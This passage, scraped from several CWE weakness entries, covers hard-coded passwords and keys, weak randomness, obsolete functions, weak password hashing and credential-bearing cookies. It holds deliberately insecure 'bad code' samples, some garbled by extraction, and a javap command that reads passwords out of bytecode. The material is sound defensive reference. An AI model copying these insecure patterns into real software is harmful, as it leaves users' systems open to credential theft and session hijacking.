exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "CISQ Quality Measures (2020)" (View-1305)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code uses a hard-coded password to connect to a database: (bad code)
Example Language: Java
...
DriverManager.getConnection(url, "scott", "tiger"); ... This is an example of an external hard-coded password on the client-side of a connection. This code will run successfully, but anyone who has access to it will have access to the password. Once the program has shipped, there is no going back from the database user "scott" with a password of "tiger" unless the program is patched. A devious employee with access to this information can use it to break into the system. Even worse, if attackers have access to the bytecode for application, they can use the javap -c command to access the disassembled code, which will contain the values of the passwords used. The result of this operation might look something like the following for the example above: (attack code)
javap -c ConnMngr.class
22: ldc #36; //String jdbc:mysql://ixne.com/rxsql
24: ldc #38; //String scott 26: ldc #17; //String tiger Example 2 The following code is an example of an internal hard-coded password in the back-end: (bad code)
Example Language: C
int VerifyAdmin(char *password) {
if (strcmp(password, "Mew!")) {
printf("Incorrect Password!\n");
return(0) printf("Entering Diagnostic Mode...\n"); return(1); (bad code)
Example Language: Java
int VerifyAdmin(String password) {
if (!password.equals("Mew!")) { }return(0) }//Diagnostic Mode return(1); Every instance of this program can be placed into diagnostic mode with the same password. Even worse is the fact that if this program is distributed as a binary-only distribution, it is very difficult to change that password or disable this "functionality." Example 3 The following code examples attempt to verify a password using a hard-coded cryptographic key. (bad code)
Example Language: C
int VerifyAdmin(char *password) {
if (strcmp(password,"68af404b513073584c4b6f22b6c63e6b")) {
printf("Incorrect Password!\n"); return(0); printf("Entering Diagnostic Mode...\n"); return(1); (bad code)
Example Language: Java
public boolean VerifyAdmin(String password) {
if (password.equals("68af404b513073584c4b6f22b6c63e6b")) {
System.out.println("Entering Diagnostic Mode..."); }return true; System.out.println("Incorrect Password!"); return false; (bad code)
Example Language: C#
int VerifyAdmin(String password) {
if (password.Equals("68af404b513073584c4b6f22b6c63e6b")) { }Console.WriteLine("Entering Diagnostic Mode..."); }return(1); Console.WriteLine("Incorrect Password!"); return(0); The cryptographic key is within a hard-coded string value that is compared to the password. It is likely that an attacker will be able to read the key and compromise the system. Example 4 The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. This Java example shows a properties file with a cleartext username / password pair. (bad code)
Example Language: Java
# Java Web App ResourceBundle properties file ... webapp.ldap.username=secretUsername webapp.ldap.password=secretPassword ... The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. (bad code)
Example Language: ASP.NET
...
<connectionStrings> <add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /> </connectionStrings>... Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. Example 5 In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. Multiple vendors used hard-coded credentials in their OT products. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-321: Use of Hard-coded Cryptographic Key
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "CISQ Quality Measures (2020)" (View-1305)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code examples attempt to verify a password using a hard-coded cryptographic key. (bad code)
Example Language: C
int VerifyAdmin(char *password) {
if (strcmp(password,"68af404b513073584c4b6f22b6c63e6b")) {
printf("Incorrect Password!\n"); return(0); printf("Entering Diagnostic Mode...\n"); return(1); (bad code)
Example Language: Java
public boolean VerifyAdmin(String password) {
if (password.equals("68af404b513073584c4b6f22b6c63e6b")) {
System.out.println("Entering Diagnostic Mode..."); }return true; System.out.println("Incorrect Password!"); return false; (bad code)
Example Language: C#
int VerifyAdmin(String password) {
if (password.Equals("68af404b513073584c4b6f22b6c63e6b")) { }Console.WriteLine("Entering Diagnostic Mode..."); }return(1); Console.WriteLine("Incorrect Password!"); return(0); The cryptographic key is within a hard-coded string value that is compared to the password. It is likely that an attacker will be able to read the key and compromise the system. Example 2 In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. Multiple vendors used hard-coded keys for critical functionality in their OT products. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Other
The main difference between the use of hard-coded passwords and the use of hard-coded cryptographic keys is the false sense of security that the former conveys. Many people believe that simply hashing a hard-coded password before storage will protect the information from malicious users. However, many hashes are reversible (or at least vulnerable to brute force attacks) -- and further, many authentication protocols simply request the hash itself, making it no better than a password.
CWE-259: Use of Hard-coded Password
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThere are two main variations of a hard-coded password: Inbound: the product contains an authentication mechanism that checks for a hard-coded password.
Outbound: the product connects to another system or component, and it contains a hard-coded password for connecting to that component.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "CISQ Quality Measures (2020)" (View-1305)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code uses a hard-coded password to connect to a database: (bad code)
Example Language: Java
...
DriverManager.getConnection(url, "scott", "tiger"); ... This is an example of an external hard-coded password on the client-side of a connection. This code will run successfully, but anyone who has access to it will have access to the password. Once the program has shipped, there is no going back from the database user "scott" with a password of "tiger" unless the program is patched. A devious employee with access to this information can use it to break into the system. Even worse, if attackers have access to the bytecode for application, they can use the javap -c command to access the disassembled code, which will contain the values of the passwords used. The result of this operation might look something like the following for the example above: (attack code)
javap -c ConnMngr.class
22: ldc #36; //String jdbc:mysql://ixne.com/rxsql
24: ldc #38; //String scott 26: ldc #17; //String tiger Example 2 The following code is an example of an internal hard-coded password in the back-end: (bad code)
Example Language: C
int VerifyAdmin(char *password) {
if (strcmp(password, "Mew!")) {
printf("Incorrect Password!\n");
return(0); printf("Entering Diagnostic Mode...\n"); return(1); (bad code)
Example Language: Java
int VerifyAdmin(String password) {
if (!password.equals("Mew!")) { }return(0); }//Diagnostic Mode return(1); Every instance of this program can be placed into diagnostic mode with the same password. Even worse is the fact that if this program is distributed as a binary-only distribution, it is very difficult to change that password or disable this "functionality." Example 3 The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. This Java example shows a properties file with a cleartext username / password pair. (bad code)
Example Language: Java
# Java Web App ResourceBundle properties file ... webapp.ldap.username=secretUsername webapp.ldap.password=secretPassword ... The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. (bad code)
Example Language: ASP.NET
...
<connectionStrings> <add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /> </connectionStrings>... Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. Example 4 In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. Multiple vendors used hard-coded credentials in their OT products. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Other In the Inbound variant, a default administration account may be created, and a simple password is hard-coded into the product and associated with that account. This hard-coded password is the same for each installation of the product, and it usually cannot be changed or disabled by system administrators without manually modifying the program, or otherwise patching the product. If the password is ever discovered or published (a common occurrence on the Internet), then anybody with knowledge of this password can access the product. Finally, since all installations of the product will have the same password, even across different organizations, this enables massive attacks such as worms to take place. The Outbound variant can apply to front-end systems that authenticate with a back-end service. The back-end service may require a fixed password that can be discovered easily. The programmer may simply hard-code those back-end credentials into the front-end product. Any user of that program may be able to extract the password. Client-side systems with hard-coded passwords pose even more of a threat, since the extraction of a password from a binary is usually very simple. Maintenance
It might be appropriate to split this entry into an inbound variant and an outbound variant. These variants are likely to have different consequences, detectability, etc., although such differences are not suitable for a split. More importantly, from a vulnerability theory perspective, they might be characterized as different behaviors. The difference is in where the hard-coded password is stored - on the component performing the authentication, or the component that is connecting to the external component that requires authentication. However, as with many weaknesses, the "vulnerability topology" should not be regarded as important enough for splits. For example, separate weaknesses do not exist for client-to-server buffer overflows versus server-to-client buffer overflows.
CWE-547: Use of Hard-coded, Security-relevant Constants
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses hard-coded constants instead of symbolic names for security-critical values, which increases the likelihood of mistakes during code maintenance or security policy change.
If the developer does not find all occurrences of the hard-coded constants, an incorrect policy decision may be made if one of the constants is not changed. Making changes to these values will require code changes that may be difficult or impossible once the system is released to the field. In addition, these hard-coded values may become available to attackers if the code is ever disclosed.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The usage of symbolic names instead of hard-coded constants is preferred. The following is an example of using a hard-coded constant instead of a symbolic name. (bad code)
Example Language: C
char buffer[1024];
... fgets(buffer, 1024, stdin); If the buffer value needs to be changed, then it has to be altered in more than one place. If the developer forgets or does not find all occurrences, in this example it could lead to a buffer overflow. (good code)
Example Language: C
enum { MAX_BUFFER_SIZE = 1024 };
... char buffer[MAX_BUFFER_SIZE]; ... fgets(buffer, MAX_BUFFER_SIZE, stdin); In this example the developer will only need to change one value and all references to the buffer size are updated, as a symbolic name is used instead of a hard-coded constant.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-330: Use of Insufficiently Random Values
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This code attempts to generate a unique random identifier for a user's session. (bad code)
Example Language: PHP
function generateSessionID($userID){
srand($userID); }return rand(); Because the seed for the PRNG is always the user's ID, the session ID will always be the same. An attacker could thus predict any user's session ID and potentially hijack the session. This example also exhibits a Small Seed Space (CWE-339). Example 2 The following code uses a statistical PRNG to create a URL for a receipt that remains active for some period of time after a purchase. (bad code)
Example Language: Java
String GenerateReceiptURL(String baseUrl) {
Random ranGen = new Random(); }ranGen.setSeed((new Date()).getTime()); return(baseUrl + ranGen.nextInt(400000000) + ".html"); This code uses the Random.nextInt() function to generate "unique" identifiers for the receipt pages it generates. Because Random.nextInt() is a statistical PRNG, it is easy for an attacker to guess the strings it generates. Although the underlying design of the receipt system is also faulty, it would be more secure if it used a random number generator that did not produce predictable receipt identifiers, such as a cryptographic PRNG. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
This can be primary to many other weaknesses such as cryptographic errors, authentication errors, symlink following, information leaks, and others.
Maintenance
As of CWE 4.3, CWE-330 and its descendants are being
investigated by the CWE crypto team to identify gaps
related to randomness and unpredictability, as well as
the relationships between randomness and cryptographic
primitives. This "subtree analysis" might
result in the addition or deprecation of existing
entries; the reorganization of relationships in some
views, e.g. the research view (CWE-1000); more consistent
use of terminology; and/or significant modifications to
related entries.
Maintenance
As of CWE 4.5, terminology related to randomness, entropy, and
predictability can vary widely. Within the developer and other
communities, "randomness" is used heavily. However, within
cryptography, "entropy" is distinct, typically implied as a
measurement. There are no commonly-used definitions, even within
standards documents and cryptography papers. Future versions of
CWE will attempt to define these terms and, if necessary,
distinguish between them in ways that are appropriate for
different communities but do not reduce the usability of CWE for
mapping, understanding, or other scenarios.
CWE-477: Use of Obsolete Function
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe code uses deprecated or obsolete functions, which suggests that the code has not been actively reviewed or maintained.
As programming languages evolve, functions occasionally become obsolete due to:
Functions that are removed are usually replaced by newer counterparts that perform the same task in some different and hopefully improved way. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code uses the deprecated function getpw() to verify that a plaintext password matches a user's encrypted password. If the password is valid, the function sets result to 1; otherwise it is set to 0. (bad code)
Example Language: C
...
getpw(uid, pwdline); for (i=0; i<3; i++){ cryptpw=strtok(pwdline, ":"); }pwdline=0; result = strcmp(crypt(plainpw,cryptpw), cryptpw) == 0; ... Although the code often behaves correctly, using the getpw() function can be problematic from a security standpoint, because it can overflow the buffer passed to its second parameter. Because of this vulnerability, getpw() has been supplanted by getpwuid(), which performs the same lookup as getpw() but returns a pointer to a statically-allocated structure to mitigate the risk. Not all functions are deprecated or replaced because they pose a security risk. However, the presence of an obsolete function often indicates that the surrounding code has been neglected and may be in a state of disrepair. Software security has not been a priority, or even a consideration, for very long. If the program uses deprecated or obsolete functions, it raises the probability that there are security problems lurking nearby. Example 2 In the following code, the programmer assumes that the system always has a property named "cmd" defined. If an attacker can control the program's environment so that "cmd" is not defined, the program throws a null pointer exception when it attempts to call the "Trim()" method. (bad code)
Example Language: Java
String cmd = null;
... cmd = Environment.GetEnvironmentVariable("cmd"); cmd = cmd.Trim(); Example 3 The following code constructs a string object from an array of bytes and a value that specifies the top 8 bits of each 16-bit Unicode character. (bad code)
Example Language: Java
...
String name = new String(nameBytes, highByte); ... In this example, the constructor may not correctly convert bytes to characters depending upon which charset is used to encode the string represented by nameBytes. Due to the evolution of the charsets used to encode strings, this constructor was deprecated and replaced by a constructor that accepts as one of its parameters the name of the charset used to encode the bytes for conversion.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-916: Use of Password Hash With Insufficient Computational Effort
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product generates a hash for a password, but it uses a scheme that does not provide a sufficient level of computational effort that would make password cracking attacks infeasible or expensive.
Many password storage mechanisms compute a hash and store the hash, instead of storing the original password in plaintext. In this design, authentication involves accepting an incoming password, computing its hash, and comparing it to the stored hash. Many hash algorithms are designed to execute quickly with minimal overhead, even cryptographic hashes. However, this efficiency is a problem for password storage, because it can reduce an attacker's workload for brute-force password cracking. If an attacker can obtain the hashes through some other method (such as SQL injection on a database that stores hashes), then the attacker can store the hashes offline and use various techniques to crack the passwords by computing hashes efficiently. Without a built-in workload, modern attacks can compute large numbers of hashes, or even exhaust the entire space of all possible passwords, within a very short amount of time, using massively-parallel computing (such as cloud computing) and GPU, ASIC, or FPGA hardware. In such a scenario, an efficient hash algorithm helps the attacker. There are several properties of a hash scheme that are relevant to its strength against an offline, massively-parallel attack:
Note that the security requirements for the product may vary depending on the environment and the value of the passwords. Different schemes might not provide all of these properties, yet may still provide sufficient security for the environment. Conversely, a solution might be very strong in preserving one property, which still being very weak for an attack against another property, or it might not be able to significantly reduce the efficiency of a massively-parallel attack. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In this example, a new user provides a new username and password to create an account. The program hashes the new user's password then stores it in a database. (bad code)
Example Language: Python
def storePassword(userName,Password):
hasher = hashlib.new('md5')
hasher.update(Password) hashedPassword = hasher.digest() # UpdateUserLogin returns True on success, False otherwise return updateUserLogin(userName,hashedPassword) While it is good to avoid storing a cleartext password, the program does not provide a salt to the hashing function, thus increasing the chances of an attacker being able to reverse the hash and discover the original password if the database is compromised. Fixing this is as simple as providing a salt to the hashing function on initialization: (good code)
Example Language: Python
def storePassword(userName,Password):
hasher = hashlib.new('md5',b'SaltGoesHere')
hasher.update(Password) hashedPassword = hasher.digest() # UpdateUserLogin returns True on success, False otherwise return updateUserLogin(userName,hashedPassword) Note that regardless of the usage of a salt, the md5 hash is no longer considered secure, so this example still exhibits CWE-327. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-309: Use of Password System for Primary Authentication
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe use of password systems as the primary means of authentication may be subject to several flaws or shortcomings, each reducing the effectiveness of the mechanism.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In both of these examples, a user is logged in if their given password matches a stored password: (bad code)
Example Language: C
unsigned char *check_passwd(char *plaintext) {
ctext = simple_digest("sha1",plaintext,strlen(plaintext), ... ); }//Login if hash matches stored hash if (equal(ctext, secret_password())) { login_user(); }(bad code)
Example Language: Java
String plainText = new String(plainTextIn);
MessageDigest encer = MessageDigest.getInstance("SHA"); encer.update(plainTextIn); byte[] digest = password.digest(); //Login if hash matches stored hash if (equal(digest,secret_password())) { login_user(); }This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user's password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328). It also does not use a salt (CWE-759).
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-539: Use of Persistent Cookies Containing Sensitive Information
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe web application uses persistent cookies, but the cookies contain sensitive information.
Cookies are small bits of data that are sent by the web application but stored locally in the browser. This lets the application use the cookie to pass information between pages and store variable information. The web application controls what information is stored in a cookie and how it is used. Typical types of information stored in cookies are session identifiers, personalization and customization information, and in rare cases even usernames to enable automated logins. There are two different types of cookies: session cookies and persistent cookies. Session cookies just live in the browser's memory and are not stored anywhere, but persistent cookies are stored on the browser's hard drive. This can cause security and privacy issues depending on the information stored in the cookie and how it is accessed.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
